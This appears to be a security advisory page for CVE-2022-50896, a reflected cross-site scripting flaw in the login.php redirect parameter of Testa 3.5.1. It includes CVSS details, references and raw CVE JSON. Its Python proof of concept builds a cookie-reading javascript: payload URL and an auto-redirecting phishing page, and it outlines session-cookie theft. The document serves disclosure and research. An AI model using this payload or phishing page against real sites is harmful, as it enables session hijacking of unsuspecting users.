Security Vulnerability Report
CVE-2022-50896 CVSS 6.1 MEDIUM

Published: 2026-01-13 23:15:51
Last Modified: 2026-04-15 00:35:42

Description

Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in the victim's browser context.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Testa Online Test Management System 3.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import urllib.parse

# CVE-2022-50896 PoC - Reflected XSS in Testa 3.5.1 login.php
# Target: Testa Online Test Management System
# Vulnerability: Unvalidated redirect parameter in login.php


def generate_xss_payload():
    """Generate XSS payload for the redirect parameter"""
    # Basic XSS payload - cookie stealing
    payload = "javascript:alert(document.cookie)"
    encoded_payload = urllib.parse.quote(payload)
    return encoded_payload


def generate_poc_url(target_url):
    """Generate PoC URL with malicious redirect parameter"""
    payload = generate_xss_payload()
    # Construct the malicious URL
    poc_url = f"{target_url}/login.php?redirect={payload}"
    return poc_url


def generate_html_phishing_page(target_url):
    """Generate HTML page that auto-triggers the XSS"""
    poc_url = generate_poc_url(target_url)
    html = f"""<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <p>If you are not redirected, <a href="{poc_url}">click here</a></p>
    <script>
        // Auto-redirect to trigger XSS
        window.location.href = "{poc_url}";
    </script>
</body>
</html>"""
    return html


# Example usage
if __name__ == "__main__":
    target = "http://testa-server.local"
    print("=== CVE-2022-50896 PoC ===")
    print(f"Target: {target}")
    print(f"\nMalicious URL:")
    print(generate_poc_url(target))
    print("\n--- Attack Scenario ---")
    print("1. Attacker crafts malicious URL with XSS payload in redirect parameter")
    print("2. Victim clicks the link or visits phishing page")
    print("3. Victim's browser executes malicious JavaScript")
    print("4. Attacker steals session cookies or performs actions as victim")
```

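References

https://web.archive.org/web/20220406031253/https://testa.cc/
https://www.exploit-db.com/exploits/51023
https://www.vulncheck.com/advisories/testa-online-test-management-system-reflected-cross-site-scripting-xss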

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50896", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:51.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Testa 3.5.1 contains a reflected cross-site scripting vulnerability in the login.php redirect parameter that allows attackers to inject malicious scripts. Attackers can craft a specially encoded payload in the redirect parameter to execute arbitrary JavaScript in victim's browser context."}, {"lang": "es", "value": "Testa 3.5.1 contiene una vulnerabilidad de cross-site scripting reflejado en el parámetro de redirección de login.php que permite a los atacantes inyectar scripts maliciosos. Los atacantes pueden crear una carga útil especialmente codificada en el parámetro de redirección para ejecutar JavaScript arbitrario en el contexto del navegador de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://web.archive.org/web/20220406031253/https://testa.cc/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51023", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/testa-online-test-management-system-reflected-cross-site-scripting-xss", "source": "[email protected]"}]}}